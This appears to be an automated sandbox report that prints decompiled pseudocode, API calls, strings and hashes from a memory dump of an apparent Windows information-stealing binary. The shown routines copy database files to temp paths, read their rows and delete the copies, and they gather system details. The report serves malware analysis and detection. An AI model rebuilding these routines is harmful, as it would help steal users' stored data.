RtlLeaveCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 004019FA
RtlDeleteCriticalSection.KERNEL32(0041C5B4,00401A11,00000000,00000000,00401A0A), ref: 00401A04

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
String ID:
API String ID: 3782394904-0
Opcode ID: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction ID: f5b3729ab89c308c15893b8da70c4d7314be5901088e834fcff69d5c90a64892
Opcode Fuzzy Hash: a533093bf643e2750fc0c7fb6ce1a8cee2193e72f340cc35e9b9a59fd34ff9a9
Instruction Fuzzy Hash: F11193B17843907ED715AB669CD1B927B969745708F50807BF100BA2F1C73DA840CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00410D88, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 194
fileCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00410D88(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				WCHAR* _t74;
				intOrPtr* _t89;
				void* _t91;
				intOrPtr* _t93;
				intOrPtr* _t97;
				intOrPtr* _t125;
				intOrPtr* _t129;
				void* _t131;
				intOrPtr* _t133;
				void* _t135;
				intOrPtr* _t137;
				intOrPtr* _t143;
				void* _t145;
				void* _t151;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t179;
				intOrPtr _t183;
				intOrPtr _t184;
				void* _t185;
				void* _t186;

				_t181 = __esi;
				_t150 = __ebx;
				_t183 = _t184;
				_t151 = 9;
				do {
					_push(0);
					_push(0);
					_t151 = _t151 - 1;
					_t188 = _t151;
				} while (_t151 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				_push(_t183);
				_push(0x410fe1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t184;
				E004034E4( &_v28);
				_push(_t183);
				_push(0x410f66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t184;
				E0040709C(GetTickCount(), __ebx,  &_v48, __esi, _t188);
				_push(_v48);
				E00406FDC( &_v52, __ebx, __edi, __esi, _t188);
				_push(_v52);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t150,  &_v40, _t188);
				E004062FC(L"%TEMP%",  &_v60, _t188);
				_push(_v60);
				_push(0x411018);
				_push(_v32);
				E00403E78();
				E004078D8(_v56, _t150,  &_v44, _t188);
				_t74 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t74, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404B58(_v64, _t150, _t151,  &_v36, _t181, _t188);
				E00403D88( &_v68, _v36);
				if(E0040776C(_v68, _t150, _t151) != 0) {
					_t89 =  *0x41b140; // 0x41ca20
					_t91 =  *((intOrPtr*)( *_t89))(E00403990(_v36),  &_v16);
					_t185 = _t184 + 8;
					__eflags = _t91;
					if(_t91 == 0) {
						_t125 =  *0x41b1b8; // 0x41c814
						_t129 =  *0x41b2d4; // 0x41ca28
						_t131 =  *((intOrPtr*)( *_t129))(_v16, E00403990( *_t125), 0xffffffff,  &_v20,  &_v24);
						_t186 = _t185 + 0x14;
						__eflags = _t131;
						if(_t131 == 0) {
							while(1) {
								_t133 =  *0x41b384; // 0x41ca2c
								_t135 =  *((intOrPtr*)( *_t133))(_v20);
								__eflags = _t135 - 0x64;
								if(_t135 != 0x64) {
									goto L9;
								}
								_t137 =  *0x41b1dc; // 0x41ca30
								E004036DC( &_v72,  *((intOrPtr*)( *_t137))(_v20, 0, _v28));
								_t143 =  *0x41b1dc; // 0x41ca30
								_t145 =  *((intOrPtr*)( *_t143))(_v20, 1, 0x411024, _v72);
								_t186 = _t186 + 0x10;
								E004036DC( &_v76, _t145);
								_push(_v76);
								_push(E00411030);
								E00403850();
							}
						}
					}
					L9:
					_t93 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t93))(_v20);
					_t97 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t97))(_v16);
					_pop(_t171);
					 *[fs:eax] = _t171;
					E00403D88(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t179);
					 *[fs:eax] = _t179;
				}
				_pop(_t173);
				 *[fs:eax] = _t173;
				_push(E00410FE8);
				E00403508( &_v76, 2);
				E00403BDC( &_v68);
				E004034E4( &_v64);
				E00403BF4( &_v60, 6);
				E004034E4( &_v36);
				E00403BDC( &_v32);
				E004034E4( &_v28);
				return E00403BDC( &_v8);
			}

0x00410d88
0x00410d88
0x00410d89
0x00410d8b
0x00410d90
0x00410d90
0x00410d92
0x00410d94
0x00410d94
0x00410d94
0x00410d97
0x00410d98
0x00410d99
0x00410d9a
0x00410d9d
0x00410da3
0x00410daa
0x00410dab
0x00410db0
0x00410db3
0x00410db9
0x00410dc0
0x00410dc1
0x00410dc6
0x00410dc9
0x00410dd4
0x00410dd9
0x00410ddf
0x00410de4
0x00410de7
0x00410df4
0x00410dff
0x00410e0c
0x00410e11
0x00410e14
0x00410e19
0x00410e24
0x00410e2f
0x00410e39
0x00410e48
0x00410e53
0x00410e5e
0x00410e69
0x00410e78
0x00410e94
0x00410e9b
0x00410e9d
0x00410ea0
0x00410ea2
0x00410eb2
0x00410ec3
0x00410eca
0x00410ecc
0x00410ecf
0x00410ed1
0x00410f2d
0x00410f31
0x00410f38
0x00410f3b
0x00410f3e
0x00000000
0x00000000
0x00410ede
0x00410eef
0x00410f02
0x00410f09
0x00410f0b
0x00410f13
0x00410f18
0x00410f1b
0x00410f28
0x00410f28
0x00410f2d
0x00410ed1
0x00410f40
0x00410f44
0x00410f4b
0x00410f52
0x00410f59
0x00410f5e
0x00410f61
0x00410f76
0x00410f84
0x00410e7a
0x00410e7c
0x00410e7f
0x00410e7f
0x00410f8b
0x00410f8e
0x00410f91
0x00410f9e
0x00410fa6
0x00410fae
0x00410fbb
0x00410fc3
0x00410fcb
0x00410fd3
0x00410fe0

APIs

GetTickCount.KERNEL32 ref: 00410DCC
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
DeleteFileW.KERNEL32(00000000), ref: 00410F84

Strings

%TEMP%, xrefs: 00410E07
.tmp, xrefs: 00410DE7

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: f1ba787bab243d8ae0bf332dfc3548e60595c157863896d08201a00fab91904c
Instruction ID: ee23a472d3747a439df3c4e0a114333c5db2ab7a39ff8a49f746a70128ed8489
Opcode Fuzzy Hash: f1ba787bab243d8ae0bf332dfc3548e60595c157863896d08201a00fab91904c
Instruction Fuzzy Hash: F0611A71A00109AFCB10EF95DC42ADEBBB8EF48315F504476F514F32A1DB79AE468B58

Uniqueness

Uniqueness Score: -1.00%

Function 00411034, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191
fileCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00411034(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				WCHAR* _t72;
				intOrPtr* _t87;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr* _t95;
				intOrPtr* _t119;
				intOrPtr* _t123;
				void* _t125;
				intOrPtr* _t127;
				void* _t129;
				intOrPtr* _t131;
				intOrPtr* _t137;
				void* _t139;
				void* _t145;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t174;
				intOrPtr _t178;
				intOrPtr _t179;
				void* _t180;
				void* _t181;

				_t176 = __esi;
				_t144 = __ebx;
				_t178 = _t179;
				_t145 = 9;
				do {
					_push(0);
					_push(0);
					_t145 = _t145 - 1;
					_t183 = _t145;
				} while (_t145 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E00404150( &_v8);
				_push(_t178);
				_push(0x411282);
				_push( *[fs:eax]);
				 *[fs:eax] = _t179;
				E00403BDC( &_v28);
				_push(_t178);
				_push(0x411212);
				_push( *[fs:eax]);
				 *[fs:eax] = _t179;
				E0040709C(GetTickCount(), __ebx,  &_v48, __esi, _t183);
				_push(_v48);
				E00406FDC( &_v52, __ebx, __edi, __esi, _t183);
				_push(_v52);
				_push(L".tmp");
				E00403E78();
				E004078D8(_v8, _t144,  &_v40, _t183);
				E004062FC(L"%TEMP%",  &_v60, _t183);
				_push(_v60);
				_push(E004112B8);
				_push(_v32);
				E00403E78();
				E004078D8(_v56, _t144,  &_v44, _t183);
				_t72 = E00403D98(_v44);
				CopyFileW(E00403D98(_v40), _t72, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404B58(_v64, _t144, _t145,  &_v36, _t176, _t183);
				E00403D88( &_v68, _v36);
				if(E0040776C(_v68, _t144, _t145) != 0) {
					_t87 =  *0x41b140; // 0x41ca20
					_t89 =  *((intOrPtr*)( *_t87))(E00403990(_v36),  &_v16);
					_t180 = _t179 + 8;
					__eflags = _t89;
					if(_t89 == 0) {
						_t119 =  *0x41b330; // 0x41c930
						_t123 =  *0x41b2d4; // 0x41ca28
						_t125 =  *((intOrPtr*)( *_t123))(_v16, E00403990( *_t119), 0xffffffff,  &_v20,  &_v24);
						_t181 = _t180 + 0x14;
						__eflags = _t125;
						if(_t125 == 0) {
							while(1) {
								_t127 =  *0x41b384; // 0x41ca2c
								_t129 =  *((intOrPtr*)( *_t127))(_v20);
								__eflags = _t129 - 0x64;
								if(_t129 != 0x64) {
									goto L9;
								}
								_t131 =  *0x41b1dc; // 0x41ca30
								E00403CF4( &_v72,  *((intOrPtr*)( *_t131))(_v20, 0, _v28));
								_t137 =  *0x41b1dc; // 0x41ca30
								_t139 =  *((intOrPtr*)( *_t137))(_v20, 1, E004112C0, _v72);
								_t181 = _t181 + 0x10;
								E00403CF4( &_v76, _t139);
								_push(_v76);
								_push(E004112C8);
								E00403E78();
							}
						}
					}
					L9:
					_t91 =  *0x41b46c; // 0x41ca38
					 *((intOrPtr*)( *_t91))(_v20);
					_t95 =  *0x41b20c; // 0x41ca24
					 *((intOrPtr*)( *_t95))(_v16);
					_pop(_t165);
					 *[fs:eax] = _t165;
					E00403C18(_v12, _v28);
					DeleteFileW(E00403D98(_v44));
				} else {
					_pop(_t174);
					 *[fs:eax] = _t174;
				}
				_pop(_t167);
				 *[fs:eax] = _t167;
				_push(E00411289);
				E00403BF4( &_v76, 3);
				E004034E4( &_v64);
				E00403BF4( &_v60, 6);
				E004034E4( &_v36);
				E00403BF4( &_v32, 2);
				return E00403BDC( &_v8);
			}

0x00411034
0x00411034
0x00411035
0x00411037
0x0041103c
0x0041103c
0x0041103e
0x00411040
0x00411040
0x00411040
0x00411043
0x00411044
0x00411045
0x00411046
0x00411049
0x0041104f
0x00411056
0x00411057
0x0041105c
0x0041105f
0x00411065
0x0041106c
0x0041106d
0x00411072
0x00411075
0x00411080
0x00411085
0x0041108b
0x00411090
0x00411093
0x004110a0
0x004110ab
0x004110b8
0x004110bd
0x004110c0
0x004110c5
0x004110d0
0x004110db
0x004110e5
0x004110f4
0x004110ff
0x0041110a
0x00411115
0x00411124
0x00411140
0x00411147
0x00411149
0x0041114c
0x0041114e
0x0041115e
0x0041116f
0x00411176
0x00411178
0x0041117b
0x0041117d
0x004111d9
0x004111dd
0x004111e4
0x004111e7
0x004111ea
0x00000000
0x00000000
0x0041118a
0x0041119b
0x004111ae
0x004111b5
0x004111b7
0x004111bf
0x004111c4
0x004111c7
0x004111d4
0x004111d4
0x004111d9
0x0041117d
0x004111ec
0x004111f0
0x004111f7
0x004111fe
0x00411205
0x0041120a
0x0041120d
0x00411222
0x00411230
0x00411126
0x00411128
0x0041112b
0x0041112b
0x00411237
0x0041123a
0x0041123d
0x0041124a
0x00411252
0x0041125f
0x00411267
0x00411274
0x00411281

APIs

GetTickCount.KERNEL32 ref: 00411078
CopyFileW.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
DeleteFileW.KERNEL32(00000000), ref: 00411230

Strings

%TEMP%, xrefs: 004110B3
.tmp, xrefs: 00411093

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$CopyCountDeleteTick
String ID: %TEMP%$.tmp
API String ID: 2381671008-3650661790
Opcode ID: 6c813f6f30e52c69c11b13ca0db13bc07111c03d37e724bc6cd42c504f57e7ca
Instruction ID: b158b585ad64a0e2cffbc60e29a794732e4ff4356334f001507f487ecad874f7
Opcode Fuzzy Hash: 6c813f6f30e52c69c11b13ca0db13bc07111c03d37e724bc6cd42c504f57e7ca
Instruction Fuzzy Hash: E4611975A00109AFDB00EB95DC82ADEBBF8EF49314F504076F514F32A1DA38AE458B58

Uniqueness

Uniqueness Score: -1.00%

Function 00417574, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00417574(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				void* _t16;
				intOrPtr* _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t49;

				_t16 = __eax +  *__eax;
				 *_t16 =  *_t16 + _t16;
				 *[cs:eax] =  *[cs:eax] + _t16;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = _t16;
				_t5 =  &_v8; // 0x41777a
				E00403980( *_t5);
				_push(_t49);
				_push(0x41761e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t49 + 0xfffffff4;
				_t46 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t46 != 0) {
					_v16 = 0;
					_t37 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t37 = 1;
					 *((intOrPtr*)(_t37 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t37);
					_push(0);
					_push(1);
					_t11 =  &_v8; // 0x41777a
					_push(E00403990( *_t11));
					if( *_t46() == 0) {
					}
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E00417625);
				_t14 =  &_v8; // 0x41777a
				return E004034E4(_t14);
			}

0x00417574
0x00417576
0x00417578
0x0041757b
0x00417585
0x00417588
0x0041758b
0x0041758e
0x00417595
0x00417596
0x0041759b
0x0041759e
0x004175b8
0x004175bc
0x004175c0
0x004175cd
0x004175d9
0x004175dc
0x004175e5
0x004175e8
0x004175ed
0x004175ee
0x004175ef
0x004175f1
0x004175f3
0x004175fb
0x00417600
0x00417600
0x00417600
0x0041760a
0x0041760d
0x00417610
0x00417615
0x0041761d

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3

Strings

zwA, xrefs: 0041758B, 00417615, 004175F3
dnsapi.dll, xrefs: 004175A8
DnsQuery_A, xrefs: 004175A3

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll$zwA
API String ID: 2574300362-2265345817
Opcode ID: 6bdd3902560739d62fc79d690f3d0dcbf2d231b852dc5b86d52374d4dc3b239c
Instruction ID: a7d4bf9b2760dea35b02269f2c10af10878945f0623a8129c970236146844d6a
Opcode Fuzzy Hash: 6bdd3902560739d62fc79d690f3d0dcbf2d231b852dc5b86d52374d4dc3b239c
Instruction Fuzzy Hash: C2119070904604AED711DBA9CD52B9EBBF8DF49714F5140B7F804E72D2D6789E018B58

Uniqueness

Uniqueness Score: -1.00%

Function 00417578, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00417578(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v117;
				intOrPtr* _t36;
				intOrPtr _t40;
				intOrPtr* _t45;
				void* _t48;

				 *[cs:eax] =  *[cs:eax] + __eax;
				_v117 = _v117 + __edx;
				_v12 = __edx;
				_v8 = __eax;
				_t5 =  &_v8; // 0x41777a
				E00403980( *_t5);
				_push(_t48);
				_push(0x41761e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t48 + 0xfffffff4;
				_t45 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t45 != 0) {
					_v16 = 0;
					_t36 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t36 = 1;
					 *((intOrPtr*)(_t36 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t36);
					_push(0);
					_push(1);
					_t11 =  &_v8; // 0x41777a
					_push(E00403990( *_t11));
					if( *_t45() == 0) {
					}
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00417625);
				_t14 =  &_v8; // 0x41777a
				return E004034E4(_t14);
			}

0x00417578
0x0041757b
0x00417585
0x00417588
0x0041758b
0x0041758e
0x00417595
0x00417596
0x0041759b
0x0041759e
0x004175b8
0x004175bc
0x004175c0
0x004175cd
0x004175d9
0x004175dc
0x004175e5
0x004175e8
0x004175ed
0x004175ee
0x004175ef
0x004175f1
0x004175f3
0x004175fb
0x00417600
0x00417600
0x00417600
0x0041760a
0x0041760d
0x00417610
0x00417615
0x0041761d

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3

Strings

zwA, xrefs: 0041758B, 00417615, 004175F3
dnsapi.dll, xrefs: 004175A8
DnsQuery_A, xrefs: 004175A3

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll$zwA
API String ID: 2574300362-2265345817
Opcode ID: 683611451f48912ee67de96a3f18f76482e6faee4b38531112f7dff33efa9d13
Instruction ID: ea46895599b20c27feb42da0d668784e66eeb00bbfd17c159799839ff483915a
Opcode Fuzzy Hash: 683611451f48912ee67de96a3f18f76482e6faee4b38531112f7dff33efa9d13
Instruction Fuzzy Hash: 7111C470904604BED711DFA9CD42B8EBBF8DB45714F5140B7F804E72C1D6789E008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041757C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0041757C(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t34;
				intOrPtr _t38;
				intOrPtr* _t43;
				void* _t46;

				_v12 = __edx;
				_v8 = __eax;
				_t3 =  &_v8; // 0x41777a
				E00403980( *_t3);
				_push(_t46);
				_push(0x41761e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				_t43 = GetProcAddress(LoadLibraryA("dnsapi.dll"), "DnsQuery_A");
				if(_t43 != 0) {
					_v16 = 0;
					_t34 = E00402530(0x30);
					_v16 = E00402530(0x48);
					 *_t34 = 1;
					 *((intOrPtr*)(_t34 + 4)) = _v12;
					_push(0);
					_push( &_v16);
					_push(_t34);
					_push(0);
					_push(1);
					_t9 =  &_v8; // 0x41777a
					_push(E00403990( *_t9));
					if( *_t43() == 0) {
					}
				}
				_pop(_t38);
				 *[fs:eax] = _t38;
				_push(E00417625);
				_t12 =  &_v8; // 0x41777a
				return E004034E4(_t12);
			}

0x00417585
0x00417588
0x0041758b
0x0041758e
0x00417595
0x00417596
0x0041759b
0x0041759e
0x004175b8
0x004175bc
0x004175c0
0x004175cd
0x004175d9
0x004175dc
0x004175e5
0x004175e8
0x004175ed
0x004175ee
0x004175ef
0x004175f1
0x004175f3
0x004175fb
0x00417600
0x00417600
0x00417600
0x0041760a
0x0041760d
0x00417610
0x00417615
0x0041761d

APIs

LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041761E,?,00000000,00000011,00000000), ref: 004175AD
GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175B3

Strings

zwA, xrefs: 0041758B, 00417615, 004175F3
dnsapi.dll, xrefs: 004175A8
DnsQuery_A, xrefs: 004175A3

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: DnsQuery_A$dnsapi.dll$zwA
API String ID: 2574300362-2265345817
Opcode ID: 697d60033c3d33510135cfd8dc7fe3b627bac7424d41906727b856e359fce3ae
Instruction ID: e3f94ad17905d3749a36cc042419755c400cae35a044259d7baf032426d6234e
Opcode Fuzzy Hash: 697d60033c3d33510135cfd8dc7fe3b627bac7424d41906727b856e359fce3ae
Instruction Fuzzy Hash: D01151B1A14608AED711DFAACD42B9EBBF8EB48714F514076F804E72C1E6789E008B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402AC4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
registryCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00402AC4() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x41b018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x41b018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x41b018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402B35);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x402b3c);
					return RegCloseKey(_v8);
				}
			}

0x00402ac5
0x00402ac7
0x00402ad1
0x00402aed
0x00402b3c
0x00402b4e
0x00402b51
0x00402b5a
0x00402aef
0x00402af1
0x00402af2
0x00402af7
0x00402afa
0x00402afd
0x00402b19
0x00402b20
0x00402b23
0x00402b26
0x00402b34
0x00402b34

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

Strings

FPUMaskValue, xrefs: 00402B10
SOFTWARE\Borland\Delphi\RTL, xrefs: 00402ADC

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C

Uniqueness

Uniqueness Score: -1.00%

Function 00415CA0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00415CA0(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char _v72;
				_Unknown_base(*)()* _t13;
				intOrPtr _t36;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t43;

				_t43 = __eflags;
				_v72 = 0;
				_t38 = __eax;
				 *[fs:eax] = _t41 + 0xffffffbc;
				_t13 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				E004028E0( &_v68, 0x40);
				_v68 = 0x40;
				 *_t13( &_v68,  *[fs:eax], 0x415d2a, _t41, __esi, __ebx, _t39);
				E0040709C(E004045CC(_v60, _v56, 0x100000, 0), _t13,  &_v72, _t38, _t43);
				E0040377C(_t38, _v72);
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00415D31);
				return E00403BDC( &_v72);
			}

0x00415ca0
0x00415caa
0x00415cad
0x00415cba
0x00415ccd
0x00415cde
0x00415ce3
0x00415cee
0x00415d05
0x00415d0f
0x00415d16
0x00415d19
0x00415d1c
0x00415d29

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,00415D2A,?,?,?), ref: 00415CC7
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00415CCD

Part of subcall function 00403BDC: SysFreeString.OLEAUT32(00000000), ref: 00403BEA

Strings

@, xrefs: 00415CE3
GlobalMemoryStatusEx, xrefs: 00415CBD
kernel32.dll, xrefs: 00415CC2

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressFreeLibraryLoadProcString
String ID: @$GlobalMemoryStatusEx$kernel32.dll
API String ID: 923276998-3878206809
Opcode ID: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
Instruction ID: 391148e63b22df71c2771543718f35c183a5c4b34bdda626484a7ccee0bd3fce
Opcode Fuzzy Hash: e51a2f2e3b8aab1e2d8a545ab74939326a9b33ddd55ab8dc17dcebaf92260da4
Instruction Fuzzy Hash: 55017571A006089BD711EBA1DD46BDE77B9EB88704F51453AF500B32D1E67C6D018659

Uniqueness

Uniqueness Score: -1.00%

Function 00406678, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E00406678(void* __ecx) {
				signed char _t3;
				signed char _t7;
				intOrPtr* _t8;
				signed char* _t11;

				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				_t3 = 0;
				 *_t11 = 0;
				if(_t8 != 0) {
					_push(_t11);
					_push(GetCurrentProcess());
					if( *_t8() == 0 ||  *_t11 == 0) {
						_t7 = 0;
					} else {
						_t7 = 1;
					}
					_t3 =  ~_t7;
					asm("sbb eax, eax");
					 *_t11 = _t3;
				}
				asm("sbb eax, eax");
				return _t3 + 1;
			}

0x0040668f
0x00406691
0x00406693
0x00406698
0x0040669a
0x004066a0
0x004066a5
0x004066ad
0x004066b1
0x004066b1
0x004066b1
0x004066b3
0x004066b5
0x004066b7
0x004066b7
0x004066be
0x004066c3

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A2C,00000000,00416CF0,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406684
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040668A
GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A2C,00000000,00416CF0,?,Windows : ,?,,?), ref: 0040669B

Strings

kernel32.dll, xrefs: 0040667F
IsWow64Process, xrefs: 0040667A

Memory Dump Source

Source File: 00000000.00000002.544349565.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: IsWow64Process$kernel32.dll
API String ID: 4190356694-3024904723
Opcode ID: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
Instruction ID: e294de711800d21e639c3a9fa9d3456d397d027599023024eec292f5251465af
Opcode Fuzzy Hash: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
Instruction Fuzzy Hash: 1FE09BB16147019EDB007BB58C41B3B21CCAB65305F031C3EA082F12C0D97EC8908A6D

Uniqueness

Uniqueness Score: -1.00%

Function 004112B8, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
fileCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E004112B8(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
